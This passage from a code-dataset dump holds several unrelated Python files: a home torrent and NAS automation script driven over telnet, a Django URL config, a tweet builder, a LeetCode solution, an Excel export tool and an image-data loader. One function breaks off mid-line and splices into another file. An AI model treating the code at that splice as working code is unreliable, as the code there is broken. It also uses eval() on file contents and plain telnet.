4b-{} 4d-{}'.format(\n fsys.get_disk_free_space('/home/yc/dn1'),\n fsys.get_disk_free_space('/a3'),\n fsys.get_disk_free_space('/b1'),\n fsys.get_disk_free_space('/b2'),\n fsys.get_disk_free_space('/aa'),\n fsys.get_disk_free_space('/a4b'),\n fsys.get_disk_free_space('/home/yc/dn'),\n ))\n\n\ndef web_download(url):\n t = time.localtime()\n prefix = '{:02d}{:02d}{:02d}'.format(t.tm_hour, t.tm_min, t.tm_sec)\n if subprocess.call(['webber', url, prefix]) != 0:\n raise Exception('error')\n \n dfn = '/home/yc/temp/' + prefix + '.down'\n pfn = '/home/yc/temp/' + prefix + '.page'\n \n if not os.path.isfile(dfn): dfn = None\n if not os.path.isfile(pfn): pfn = None\n return dfn, pfn\n\n\ndef web_download_page(url):\n dfn, pfn = web_download(url)\n if dfn:\n fsys.remove(dfn)\n fsys.remove(pfn)\n raise Exception('error')\n\n html = open(pfn).read()\n fsys.remove(pfn)\n return html\n\n\ndef get_ttg_torrent_url(idx):\n html = web_download_page('https://totheglory.im/details.php?id={}'.format(idx))\n i = html.find('download.php')\n if i < 0: raise Exception('No link in html')\n j = html.find('\"', i)\n if j < 0: raise Exception('No link in html')\n link = 'https://totheglory.im/' + html[i:j-1]\n return link\n\n\ndef download_torrent_file(value):\n if value[-1:] == '.': value = value[:-1]\n if value[0] == 'o':\n url = 'https://open.cd/download.php?id={}'.format(value[1:])\n elif value[0] == 't':\n url = get_ttg_torrent_url(value[1:])\n elif value[0] == 'm':\n url = 'https://tp.m-team.cc/download.php?id={}'.format(value[1:])\n elif value[0] == 'h':\n url = 'https://hdchina.club/download.php?id={}'.format(value[1:])\n else:\n raise Exception('error')\n\n dfn, pfn = web_download(url)\n if not dfn:\n fsys.remove(pfn)\n raise Exception('error')\n\n return dfn\n\n\ndef keep_young_torrent_file(folder, prefix, keep_count):\n a = []\n for x in os.listdir(folder):\n if not x.startswith(prefix): continue\n st = os.stat(os.path.join(folder, x))\n a.append((x, st.st_atime))\n if len(a) > keep_count:\n a.sort(key=lambda x:x[1])\n for i in range(len(a)-keep_count):\n fn = os.path.join(folder, a[i][0])\n fsys.remove(fn)\n\n\ndef get_torrent_file(value):\n # convert argument\n if value[-1:] == '.': value = value[:-1]\n \n # already in Downloads\n dndir = os.path.join(os.environ['HOME'], 'torrent')\n tfn = os.path.join(dndir, value+'.torrent')\n if os.path.isfile(tfn):\n return tfn\n\n tfn1 = os.path.join(os.environ['HOME'], 'Downloads', value+'.torrent')\n if os.path.isfile(tfn1):\n fsys.copy(tfn1, tfn, prompt=False)\n return tfn\n\n dfn = download_torrent_file(value)\n shutil.copy(dfn, tfn)\n keep_young_torrent_file(dndir, value[0], 100)\n return tfn\n\n\ndef mount_a4():\n def is_mount(d):\n subprocess.call(['ls', '/home/yc/a4d'],\n stdout=subprocess.PIPE)\n o = subprocess.check_output(['df', '-h', d])\n return o.find(b'192.168.1.156') >= 0\n \n def mount(d):\n if is_mount(d): return True\n subprocess.call(['mount', d])\n return is_mount(d)\n\n if not mount('/home/yc/a4a') or not mount('/home/yc/a4d'):\n return False\n return True\n\n\ndef check_download_a4(tfn, ddir):\n assert isA4Mounted(), 'A4 is not mounted'\n\n # copy torrent file to share folder\n tfn_rm = '/home/yc/dn1/' + os.path.basename(tfn)\n if os.path.isfile(tfn_rm): os.remove(tfn_rm)\n shutil.copyfile(tfn, tfn_rm)\n\n telnet.py('a4',\n 'import torrentcheck\\ntorrentcheck.do_check([{},{}])',\n tfn_rm, ddir)\n \n os.remove(tfn_rm)\n '''\n # copy torrent file to share folder\n tfn_rm = '/home/yc/dn1/' + os.path.basename(tfn)\n if os.path.isfile(tfn_rm): os.remove(tfn_rm)\n shutil.copyfile(tfn, tfn_rm)\n \n # remove check.result\n rfn = '/home/yc/dn1/check.result'\n if os.path.isfile(rfn): os.remove(rfn)\n\n # telnet\n name = os.path.basename(ddir)\n prefix = name[:name.find('.')]\n pdir = os.path.dirname(ddir)\n cmd = ['cd /home/yc/dn',\n 'python3 front.py check \"{}\" \"{}\" {}'.format(tfn_rm, pdir, prefix)]\n telnet.telnet_nas('a4', cmd)\n\n os.remove(tfn_rm)\n\n # check result\n if not os.path.isfile(rfn):\n raise Exception('Check fail. No {}'.format(rfn))\n if open(rfn).read() != '0':\n raise Exception('Check fail. Not 0 result.')\n '''\n\n\ndef check_download(tfn, ddir):\n srv, _ = get_local_name(ddir)\n if srv == 'a3':\n torrentcheck.do_check([tfn, ddir, 2])\n elif srv == 'a4':\n check_download_a4(tfn, ddir)\n else:\n torrentcheck.do_check([tfn, ddir, 2])\n\n\ndef isA4Mounted():\n if subprocess.call(['ping', '-c', '1', '192.168.1.156']) != 0:\n return False\n if os.path.isdir('/aa/blue') and os.path.isdir('/aa/pc'):\n return True\n else:\n return False\n\n\ndef copyInA4(src, dst):\n assert isA4Mounted(), 'a4 is not mounted or power on'\n \n if fsys.get_disk_free_space('/aa') < 50:\n raise Exception('Free space is low') \n\n telnet.py('a4',\n 'import fsys\\nfsys.lcpto({},{},3)',\n src, dst)\n\n\ndef move_one(value, folder, remove_src = True):\n # in TM?\n t = tm.find(value)\n if not t: raise Exception('Not in TM {}'.format(value))\n if t.progress != 100: raise Exception('Progress {} {}'.format(t.progress, value))\n\n # trim folder name\n if folder[-1] == '/': folder = folder[:-1]\n\n # copy to same folder?\n sour = t.downloadDir\n if sour[-1] == '/': sour = sour[:-1]\n if sour == folder: raise Exception('sour same as dest')\n sour = sour + '/' + t.name\n\n # get torrent file\n tfn = get_torrent_file(value)\n\n # copy\n if not isA4Mounted() or \\\n get_local_name(sour)[0] == 'a3' and get_local_name(folder)[0] == 'a3':\n if gui_copy.work(['-co','-end','-d10', sour, folder]) != 0: return\n else:\n copyInA4(sour, folder)\n\n # lock dest\n dest = os.path.join(folder, t.name)\n if not folder.startswith('/home/yc/a4d'):\n lock(dest)\n\n # verify\n time0 = time.time()\n check_download(tfn, dest)\n second = int(time.time() - time0)\n subprocess.call(['du','-sh', dest], stdout=sys.stdout)\n print('{0[0]}m {0[1]}s'.format(divmod(second,60)))\n\n # stop torrent, relocate and start\n tm.setup_transmission_client()\n tm.stop_torrent(t.hashString)\n if folder.startswith('/home/yc/a4d'):\n tm.remove_torrent(t.hashString)\n else:\n time.sleep(5)\n tm.locate_torrent_data(t.hashString, location = folder)\n if get_local_name(folder)[0] != 'a4':\n print('start torrent')\n tm.start_torrent(t.hashString)\n\n # update cache\n if folder in ['/aa/blue', '/aa/xyz/game', '/aa/pc', '/aa/ps3', '/aa/doc']:\n cfn = '/home/yc/temp/down-cache'\n l = eval(open(cfn, encoding='utf8').read())\n l.append(value)\n open(cfn, 'w', encoding='utf8').write(repr(l))\n\n if dest[3:7] == '/4d/':\n copyInA4(dest, '/home/yc/dn/xx')\n lock(os.path.join('/home/yc/dn/xx', t.name))\n if dest[3:7] == '/4a/':\n copyInA4(dest, '/aa/blue/xx')\n lock(os.path.join('/aa/blue/xx', t.name))\n if dest[3:7] == '/4b/':\n copyInA4(dest, '/a4b/xx')\n lock(os.path.join('/a4b/xx', t.name))\n if dest[3:7] in ['/b6/','/b7/','/b8/','/b9/']:\n copyInA4(dest, dest[3:7]+'xx')\n lock(os.path.join(dest[3:7]+'xx', t.name))\n \n if remove_src:\n unlock(sour)\n fsys.remove(sour)\n\n\ndef do_move(argv):\n folder = argv[0]\n if not folder.startswith('/'):\n folder = '/aa/' + folder\n for x in argv[1:]:\n move_one(x, folder)\n\n\ndef do_gog_copy(argv):\n d_done_fn = '/home/yc/temp1/t324978.done'\n d_done = {}\n if os.path.isfile(d_done_fn):\n d_done = eval(open(d_done_fn, 'r', encoding='utf8').read())\n\n def the_filter(ps):\n r = not d_done.get(ps['name'])\n return r\n\n for x in torrent.enum_other_done_file('t324978', 't324338', the_filter):\n print(x['src'])\n print(x['dst'])\n input('copy...')\n\n fsys.copy(x['src'], x['dst'])\n d_done[x['src_name']] = True\n open(d_done_fn, 'w', encoding='utf8').write(repr(d_done))\n\n\ndef do_dup(argv):\n v = argv[0]\n t = tm.find(v)\n if not t: raise Exception('error')\n if t.downloadDir != '/b9' and t.downloadDir != '/b9/': raise Exception('error')\n \n print(t.name)\n telnet.telnet_nas('a4', 'fcp \"/b9/{}\" ~/dn/b9'.format(t.name))\n \n tmc = tm.setup_transmission_client()\n print(\"stop...\")\n tmc.stop_torrent(t.hashString)\n \n telnet.telnet_nas('a1',\n ['chmod -R +w \"/share/b4/{}\"'.format(t.name),\n 'mv \"/share/b4/{}\" /share/b4/4d'.format(t.name),\n 'chmod -R -w \"/share/b4/4d/{}\"'.format(t.name)\n ])\n \n print(\"relocate...\")\n tmc.locate_torrent_data(t.hashString, location='/b9/4d')\n print(\"start...\")\n tmc.start_torrent(t.hashString)\n\n\ndef do_test1(argv):\n for src, dst in torrent.get_local_exist_file('/b8/t324338.torrent',\n '/home/yc/a4a/pc/t33232.GoG',\n '/b8/t324338.Good Old Games (GOG) Colossal Collection - 1,200+ DRM Free Games - October 29th, 2015'):\n print(src)\n print(dst)\n input('copy...')\n telnet.telnet_nas('a4',\n ['rm \"{}\"'.format(dst),\n 'python3 /home/yc/dn/mypy/fsys.py copy_file \"{}\" \"{}\"'.format(\n src.replace('/home/yc/a4a/', '/aa/'),\n dst\n )\n ])\n\n\nclass DiffSzCopy:\n def __init__(self, src_dir, src_ns, dst_dir, dst_ns, offset):\n self.src_dir = src_dir\n self.src_ns = src_ns\n self.dst_dir = dst_dir\n self.dst_ns = dst_ns\n self.offset = offset\n \n def read(self, sz):\n b = b''\n while sz:\n if self.src_idx >= len(self.src_ns):\n b += b'\\x00' * sz\n break\n \n if self.src_f == 0:\n n = self.src_ns[self.src_idx]['name']\n fn = os.path.join(self.src_dir, n)\n self.src_f = open(fn, 'rb')\n self.src_offset = 0\n\n fsz = self.src_ns[self.src_idx]['size']\n readsz = min(sz, fsz - self.src_offset)\n b += self.src_f.read(readsz)\n self.src_offset += readsz\n sz -= readsz\n \n if self.src_offset == fsz:\n self.src_f.close()\n self.src_f = 0\n self.src_idx += 1\n\n return b\n\n def write(self, buf):\n bufOffset = 0\n while bufOffset < len(buf):\n if self.dst_f == 0:\n n = self.dst_ns[self.dst_idx]['name']\n fn = os.path.join(self.dst_dir, n)\n fsys.mkdir(os.path.dirname(fn))\n self.dst_f = open(fn, 'wb')\n self.dst_offset = 0\n \n fileSz = self.dst_ns[self.dst_idx]['size']\n writeSz = min(len(buf)-bufOffset, fileSz-self.dst_offset)\n self.dst_f.write(buf[bufOffset:bufOffset+writeSz])\n bufOffset += writeSz\n self.dst_offset += writeSz\n \n if self.dst_offset == fileSz:\n self.dst_f.close()\n self.dst_f = 0\n self.dst_idx += 1\n \n def copy(self):\n print('offset', self.offset)\n self.src_f = self.src_idx = self.src_offset = 0\n self.dst_f = self.dst_idx = self.dst_offset = 0\n sz = sum([x['size'] for x in self.dst_ns])\n \n offset = self.offset\n while offset > 0:\n runsz = min(offset, 128*1024)\n self.read(runsz)\n offset -= runsz \n \n print('{:06,}'.format(sz//fsys.MB), end='', flush=True)\n while sz:\n runsz = min(128*1024, sz)\n t1 = time.time()\n b = self.read(runsz)\n self.write(b)\n t2 = time.time()\n sz -= runsz\n print('\\b'*6+'{:06,}'.format(sz//fsys.MB), end='', flush=True)\n time.sleep(2*(t2-t1))\n print('')\n \n\n\ndef do_test2(argv):\n import transmissionrpc\n d1 = '/b8/t324338.Good Old Games (GOG) Colossal Collection - 1,200+ DRM Free Games - October 29th, 2015'\n p1 = 't324338'\n d2 = '/home/yc/dn/t312487.GOG Collection part 7 (U-Z)'\n p2 = 't312487'\n p3 = None\n '''\n p3 = 't'\n '''\n \n ns1 = torrent.get_name_size('/b8/'+p1+'.torrent')\n ns2 = torrent.get_name_size('/b8/'+p2+'.torrent')\n\n def has_key(x, key):\n return x['name'].lower().find(key.lower()) >= 0\n \n def has_keys(x, keys):\n return all([has_key(x, k) for k in keys])\n\n def get_next(tmc, t, prefix):\n fn = '/home/yc/temp1/'+p2+'.key'\n files = t.files()\n if os.path.isfile(fn):\n i = int(open(fn, 'r', encoding='utf8').read())\n else:\n i = -1\n print(i)\n while True:\n i += 1\n if i >= len(files): return None\n f = files[i]\n n = f['name']\n print('<{}/() {}>'.format(i, len(files), n))\n if n.endswith('.exe') or n.endswith('.bin'):\n break\n bn = os.path.basename(n)\n open(fn, 'w', encoding='utf8').write(str(i))\n return bn\n\n def isComplete(t, l):\n ll = [x for x in l]\n files = t.files()\n for x in files.values():\n n = x['name']\n n = n[n.find('/')+1:]\n for y in ll:\n if n == y['name']:\n if x['completed'] != x['size']:\n print(x)\n return False\n ll.remove(y)\n break\n if len(ll) == 0: return True\n print(ll)\n raise Exception('error')\n\n def copy(src, ddir, delay):\n bn = os.path.basename(src)\n dst = os.path.join(ddir, bn)\n for x in fsys.get_sub_name(src):\n s = os.path.join(src, x)\n d = os.path.join(dst, x)\n fsys.remove(d)\n fsys.copy(s, d, prompt=True, delay=delay)\n\n tm.setup_transmission_client()\n t1 = tm.find(p1)\n if p3: t3 = tm.find(p3)\n\n tmc = transmissionrpc.Client(address='192.168.1.156')\n t2 = tmc.get_torrents()[0]\n \n if t2.downloadDir != '/home/yc/dn':\n tmc.locate_torrent_data(t2.hashString, location = '/home/yc/dn')\n \n for _ in range(30):\n if len(argv) == 0:\n key = get_next(tmc, t2, p2)\n else:\n key = argv[0]\n fn = '/home/yc/temp1/'+p2+'.key'\n open(fn, 'w', encoding='utf8').write(key)\n argv = []\n if not key:\n print('Finished...')\n break\n \n if key.endswith('.bin'):\n keys = [key[:-5], key[-4:]]\n else:\n keys = [key]\n \n l2 = [x for x in ns2 if has_keys(x, keys)]\n l2.sort(key=lambda x : x['name'])\n l1 = [x for x in ns1 if has_keys(x, keys)]\n l1.sort(key=lambda x : x['name'])\n if not isComplete(t1, l1): raise Exception('Not complete')\n \n for x in l1: print(x['name'])\n print('')\n for x in l2: print(x['name'], '*' if x['name'].endswith(key) else '')\n \n if len(l1) != len(l2): continue\n \n src_sz = sum([x['size'] for x in l1])\n dst_sz = sum([x['size'] for x in l2])\n print('sz {:,} {:,} {:,}'.format(src_sz, dst_sz, src_sz-dst_sz))\n \n if len(l1)>1 and input('chk?...') != '': continue\n \n offset = 0\n if argv[1:] and argv[1] == 'offset':\n if src_sz > dst_sz:\n offset = src_sz - dst_sz\n \n c = DiffSzCopy(d1, l1, d2, l2, offset)\n c.copy()\n \n tmc.verify_torrent(t2.hashString)\n while True:\n t2.update()\n progress = int(t2.recheckProgress * 100)\n print('\\b\\b\\b{}'.format(progress), end='', flush=True)\n if t2.status != 'checking': break\n time.sleep(8)\n print('')\n \n bHasData = False\n for x in t2.files().values():\n for y in l2:\n if x['name'].find(y['name']) >= 0:\n if x['completed'] != 0: bHasData = True\n print(x['completed']*100//x['size'],\n y['name'])\n \n if bHasData:\n copy(d2, '/home/yc/dn1', 3)\n #fsys.lcpto(d2, '/home/yc/dn1', 3)\n fsys.remove(d2)\n print('\\n')\n\n\ndef do_link_gog(argv):\n d1 = '/b8/t324338.Good Old Games (GOG) Colossal Collection - 1,200+ DRM Free Games - October 29th, 2015'\n d2 = '/b1/t324974.GOG Collection part 4 (M-R)'\n pre1 = re.search('t[0-9]*', d1).group(0)\n pre2 = re.search('t[0-9]*', d2).group(0)\n tm.setup_transmission_client()\n t1 = tm.find(pre1)\n files1 = t1.files()\n t2 = tm.find(pre2)\n\n startIdx = 0\n if argv[0:1]: startIdx = int(argv[0])\n\n def _get_path(x):\n n = x['name']\n n = n[n.find('/')+1:]\n return n\n\n def _get_lowername(x):\n n = os.path.basename(x['name'])\n n = n.lower()\n return n\n\n def _find_match(x, files, t):\n ln1 = _get_lowername(x)\n for x2 in files.values():\n ln2 = _get_lowername(x2)\n if ln1 == ln2:\n if x2['completed'] != x2['size']:\n msg = 'Not completed ' + x2['name']\n tm.enableDownload(t, x2['name'])\n raise Exception(msg)\n if x['size'] == x2['size']:\n return x2\n \n for idx, x2 in enumerate(t2.files().values()):\n if idx < startIdx: continue\n x1 = _find_match(x2, files1, t1)\n if x1 == None: continue\n print(idx, x2['name'])\n print('---', x1['name'])\n fn1 = os.path.join(d1, _get_path(x1))\n fn2 = os.path.join(d2, _get_path(x2))\n py = '''\nimport fsys, os, subprocess\ndef func():\n fn1 = '{}'\n fn2 = '{}'\n print('check link')\n if os.path.islink(fn1): return\n print('cmp', '{}'.format(os.stat(fn1).st_size))\n if fsys.cmp_file(fn1, fn2) != 'same': return\n print('same')\n os.remove(fn1)\n os.symlink(fn2, fn1)\n\nfunc()\n'''\n py = py.format(fn1.replace(\"'\",\"\\\\'\"),\n fn2.replace(\"'\",\"\\\\'\"),\n '{:,}')\n open('/b6/mypy/test.py', 'wt', encoding='utf8').write(py)\n telnet.telnet_nas('a1',\n ['python3 /b6/mypy/test.py',\n 'if [ \"$?\" != \"0\" ]; then sleep 10000; fi'\n ])\n print('=========================')\n time.sleep(2)\n\n\ndef do_asstr(argv):\n n = 'Year2017'\n url = 'http://www.asstr.org/files/Collections/Alt.Sex.Stories.Moderated/'+n\n htmlFn = '/home/yc/'+n\n if not os.path.isfile(htmlFn):\n os.chdir(os.path.dirname(htmlFn))\n assert subprocess.call(['wget', url]) == 0\n html = open('/home/yc/'+n).read()\n d = '/home/yc/temp/'+n\n fsys.mkdir(d)\n os.chdir(d)\n i = html.find('Parent Directory')\n assert i >= 0\n while True:\n i = html.find('[\\w\\-]+)', views.records, name='Records'),\n path('records/', views.records, name='Records'),\n path('schedule/', views.schedule, name='Schedule'),\n path('FAQ/', views.FAQs, name='FAQ'),\n url(r'^news/(?P[0-9]+)/(?P[0-9]+)', views.news, name='News'),\n url(r'^news/(?P[0-9]+)/', views.news, name='News'),\n path('news/', views.news, name='News'),\n path('exec/',views.Exec, name='Exec'),\n path('routes/',views.Routes, name='Routes'),\n]\n","sub_path":"RunningClubSite/Main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"155239116","text":"# -*- coding: utf-8 -*-\n# Copyright © 2015 Carl Chenet \n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see \n\n# Build the tweet to send\n'''Build the tweet to send'''\n\nclass TwBuild(object):\n '''TwBuild class'''\n def __init__(self, cfgvalues, dbvalues):\n '''Constructor for the TwBuild class'''\n self.cfgvalues = cfgvalues\n self.dbvalues = dbvalues\n self.tweets = []\n self.main()\n\n def main(self):\n '''main of TwBuild class'''\n # get hashtags\n if self.cfgvalues['hashtags'] != '':\n hashtags = self.cfgvalues['hashtags'].split(',')\n hashtags = [i for i in hashtags if i != '']\n for i in self.dbvalues:\n j = self.cfgvalues['tweet'].format(*i)\n # identify and replace hashtags\n j = j.lower()\n for hashtag in hashtags:\n pattern = ' ' + hashtag\n if pattern in j.lower():\n j = j.replace(pattern, ' #{}'.format(hashtag))\n # uppercase for the first letter of the tweet\n if self.cfgvalues['upper_first_char']:\n j = j[0].upper() + j[1:]\n self.tweets.append(j)\n\n @property\n def readytotweet(self):\n '''return the tweet ready to be sent'''\n return self.tweets\n","sub_path":"db2twitter/twbuild.py","file_name":"twbuild.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"2353900","text":"'''\n19. Remove Nth Node From End of List\n\n\nGiven a linked list, remove the n-th node from the end of list and return its head.\n\nExample:\n\nGiven linked list: 1->2->3->4->5, and n = 2.\n\nAfter removing the second node from the end, the linked list becomes 1->2->3->5.\nNote:\n\nGiven n will always be valid.\n\nFollow up:\n\nCould you do this in one pass?\n\n\n'''\n\n\n\n# not my idea\n\n\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def removeNthFromEnd(self, head, n):\n \"\"\"\n :type head: ListNode\n :type n: int\n :rtype: ListNode\n \"\"\"\n dummy = ListNode(None)\n dummy.next = head\n first = dummy\n second = dummy\n i=1\n while i < n+2:\n first = first.next\n i += 1\n while first:\n first = first.next\n second = second.next\n second.next = second.next.next\n return dummy.next\n\n\n# 2020/05/22, two pointer\n\n'''\nRuntime: 60 ms, faster than 5.69% of Python3 online submissions for Remove Nth Node From End of List.\nMemory Usage: 13.7 MB, less than 6.06% of Python3 online submissions for Remove Nth Node From End of List.\n'''\n\n\nclass Solution:\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n dummy = ListNode(None)\n dummy.next = head\n fast = slow = dummy\n for i in range(n):\n fast = fast.next\n while fast and fast.next:\n slow = slow.next\n fast = fast.next\n node = slow.next\n slow.next = node.next\n return dummy.next","sub_path":"0019. Remove Nth Node From End of List.py","file_name":"0019. Remove Nth Node From End of List.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"200190563","text":"from openpyxl import Workbook\nimport os\nfrom tkinter import *\n\nclass XLSync:\n def __init__(self, path, name):\n print(\"Initializing object\")\n self.path = path\n self.name = name\n\n def execute(self):\n wb = Workbook()\n print(\"Workbook created\")\n ws = wb.active\n print(\"Workbook activated\")\n count = 0\n dir_count = 0\n for dir, subdir, file in os.walk(self.path):\n index=0\n dir_count += 1\n while count< len(file):\n ws.cell(row=count+1, column = 1, value=file[index])\n count+=1\n index+=1\n print(\"directory {0} uploaded\".format(dir_count))\n\n wb.save(\"{0}.xlsx\".format(self.name))\n print(\"excel file saved\")\n\n#create window\nwindow = Tk()\n#First input\nframe1=Frame()\nframe1.pack(fill= X)\n\npath_label= Label(frame1, text= \"File Path\", width=6)\npath_label.pack(side = LEFT, padx = 5, pady= 5)\n\nentry1 = Entry(frame1)\nentry1.pack(fill=X, padx=5, expand=True)\n\n#Second Entry\nframe2 = Frame()\nframe2.pack(fill=X)\n\nname_file = Label(frame2, text= \"File Name\", width = 10)\nname_file.pack(side=LEFT, padx= 5, pady=5)\n\nentry2 = Entry(frame2)\nentry2.pack(fill=X, padx=5, expand=True)\n\ndef print_text():\n path = entry1.get()\n name = entry2.get()\n return path, name\n\ndef close_window():\n window.destroy()\n\ndef combine_functions():\n path, name = print_text()\n print(\"Path received: {0}\".format(path))\n print(\"File name received: {0}\".format(name_file))\n XLSync(path, name).execute()\n close_window()\n\n#enter button\nenter_button = Button(window, text=\"Enter\", command=combine_functions)\nenter_button.pack(side=RIGHT)\n\nwindow.mainloop()\n","sub_path":"XL_Sync.py","file_name":"XL_Sync.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"35463512","text":"#字典\n#1. 创建字典{}\n#2. dict()转换为字典\nlol=[['a','b'],['c','d']]\ndict(lol)\n#3. [key]添加修改元素\n#4. update()合并字典\n#5. del删除具有指定key的元素\n#6. clear()删除所有元素\n#7. in\n#8. 获取元素[key]或get()\n#9. keys()获取所有键\n#10. values()获取所有值\n#11. items()\n#12. copy()复制\n","sub_path":"p3.py","file_name":"p3.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"226617477","text":"import pandas as pd\nimport numpy as np\nimport random\nimport logging\nimport cv2\nimport sys\nfrom DataManipulator import DataManipulator\nsys.path.append(\"../DataProcessing/\")\nfrom ImageTransformer import ImageTransformer\n\nclass DataProcessor:\n\n @staticmethod\n def ProcessTrainData(trainPath, isExtended=False):\n \"\"\"Reads the .pickle file and converts it into a format suitable fot training\n\n Parameters\n ----------\n trainPath : str\n The file location of the .pickl\n isExtended : bool, optional\n True if the dataset contains both head and hand pose and you wish to retrieve both\n\n\n Returns\n -------\n list\n list of video frames and list of labels (poses)\n \"\"\"\n train_set = pd.read_pickle(trainPath)\n\n logging.info('[DataProcessor] train shape: ' + str(train_set.shape))\n size = train_set.shape[0]\n n_val = int(float(size) * 0.2)\n #n_val = 13000\n\n h, w, c = DataManipulator.GetSizeDataFromDataFrame(train_set)\n\n np.random.seed(1749)\n random.seed(1749)\n # split between train and test sets:\n x_train = train_set['x'].values\n x_train = np.vstack(x_train[:]).astype(np.float32)\n x_train = np.reshape(x_train, (-1, h, w, c))\n\n x_train= np.swapaxes(x_train, 1, 3)\n x_train = np.swapaxes(x_train, 2, 3)\n\n y_train = train_set['y'].values\n y_train = np.vstack(y_train[:]).astype(np.float32)\n\n ix_val, ix_tr = np.split(np.random.permutation(train_set.shape[0]), [n_val])\n x_validation = x_train[ix_val, :]\n x_train = x_train[ix_tr, :]\n y_validation = y_train[ix_val, :]\n y_train = y_train[ix_tr, :]\n\n shape_ = len(x_train)\n\n sel_idx = random.sample(range(0, shape_), k=(size-n_val))\n #sel_idx = random.sample(range(0, shape_), k=50000)\n x_train = x_train[sel_idx, :]\n y_train = y_train[sel_idx, :]\n\n\n\n if isExtended == True:\n z_train = train_set['z'].values\n z_train = np.vstack(z_train[:]).astype(np.float32)\n z_validation = z_train[ix_val, :]\n z_train = z_train[ix_tr, :]\n z_train = z_train[sel_idx, :]\n return [x_train, x_validation, y_train, y_validation, z_train, z_validation]\n\n return [x_train, x_validation, y_train, y_validation]\n\n @staticmethod\n def ProcessTestData(testPath, isExtended=False):\n \"\"\"Reads the .pickle file and converts it into a format suitable fot testing\n\n Parameters\n ----------\n testPath : str\n The file location of the .pickle\n isExtended : bool, optional\n True if the dataset contains both head and hand pose and you wish to retrieve both\n\n\n Returns\n -------\n list\n list of video frames and list of labels (poses)\n \"\"\"\n\n test_set = pd.read_pickle(testPath)\n logging.info('[DataProcessor] test shape: ' + str(test_set.shape))\n h, w, c = DataManipulator.GetSizeDataFromDataFrame(test_set)\n\n x_test = test_set['x'].values\n x_test = np.vstack(x_test[:]).astype(np.float32)\n x_test = np.reshape(x_test, (-1, h, w, c))\n\n\n x_test = np.swapaxes(x_test, 1, 3)\n x_test = np.swapaxes(x_test, 2, 3)\n y_test = test_set['y'].values\n y_test = np.vstack(y_test[:]).astype(np.float32)\n\n if isExtended ==True:\n z_test = test_set['z'].values\n z_test = np.vstack(z_test[:]).astype(np.float32)\n return [x_test, y_test, z_test]\n\n\n return [x_test, y_test]\n\n @staticmethod\n def GetTimeStampsFromTestData(testPath):\n\n \"\"\"Reads the .pickle file and extrects the frames' timestamps\n\n Parameters\n ----------\n testPath : str\n The file location of the .pickle\n\n Returns\n -------\n list\n list of timestamps\n \"\"\"\n\n t_test = None\n test_set = pd.read_pickle(testPath)\n logging.info('[DataProcessor] test shape: ' + str(test_set.shape))\n if 't' in test_set.columns:\n t_test = test_set['t'].values\n\n\n return t_test\n\n @staticmethod\n def GetOutputsFromTestData(testPath):\n\n \"\"\"Reads the .pickle file and extrects the recorded NNs outputs\n\n Parameters\n ----------\n testPath : str\n The file location of the .pickle\n\n Returns\n -------\n list\n list of outputs/predictions\n \"\"\"\n\n o_test = None\n test_set = pd.read_pickle(testPath)\n logging.info('[DataProcessor] test shape: ' + str(test_set.shape))\n if 'o' in test_set.columns:\n o_test = test_set['o'].values\n o_test = np.vstack(o_test[:]).astype(np.float32)\n\n return o_test\n\n @staticmethod\n def GetPitchFromTestData(testPath):\n\n \"\"\"Reads the .pickle file and extracts the pitch values\n\n Parameters\n ----------\n testPath : str\n The file location of the .pickle\n\n Returns\n -------\n list\n list of pitch values\n \"\"\"\n\n p_test = None\n test_set = pd.read_pickle(testPath)\n logging.info('[DataProcessor] test shape: ' + str(test_set.shape))\n if 'p' in test_set.columns:\n p_test = test_set['p'].values\n\n return p_test\n\n @staticmethod\n def GetRollFromTestData(testPath):\n\n \"\"\"Reads the .pickle file and extracts the roll values\n\n Parameters\n ----------\n testPath : str\n The file location of the .pickle\n\n Returns\n -------\n list\n list of roll values\n \"\"\"\n\n r_test = None\n test_set = pd.read_pickle(testPath)\n logging.info('[DataProcessor] test shape: ' + str(test_set.shape))\n if 'r' in test_set.columns:\n r_test = test_set['r'].values\n\n return r_test\n\n @staticmethod\n def ExtractValidationLabels(testPath):\n \"\"\"Reads the .pickle file and converts it into a format suitable for testing on pulp\n You need to create a folder called test though\n\n Parameters\n ----------\n testPath : str\n The file location of the .pickle\n\n \"\"\"\n\n test_set = pd.read_pickle(testPath)\n logging.info('[DataProcessor] test shape: ' + str(test_set.shape))\n\n x_test = test_set['x'].values\n x_test = np.vstack(x_test[:]).astype(np.float32)\n h, w, c = DataManipulator.GetSizeDataFromDataFrame(test_set)\n x_test = np.reshape(x_test, (-1, h, w, c))\n\n x_test = np.swapaxes(x_test, 1, 3)\n x_test = np.swapaxes(x_test, 2, 3)\n y_test = test_set['y'].values\n y_test = np.vstack(y_test[:]).astype(np.float32)\n\n f = open(\"test/labels.txt\", \"w\")\n\n for i in range(0, len(x_test)):\n data = x_test[i]\n data = np.swapaxes(data, 0, 2)\n data = np.swapaxes(data, 0, 1)\n img = np.reshape(data, (h, w))\n #img = np.zeros((244, 324), np.uint8)\n #img[92:152, 108:216] = data\n cv2.imwrite(\"test/{}.pgm\".format(i), img)\n label = y_test[i]\n #f.write(\"{},{},{},{}\\n\".format(label[0], label[1],label[2],label[3]))\n f.close()\n\n\n\n @staticmethod\n def ProcessInferenceData(images, image_height, image_width, isGray=False):\n \"\"\"Converts a list of images into a 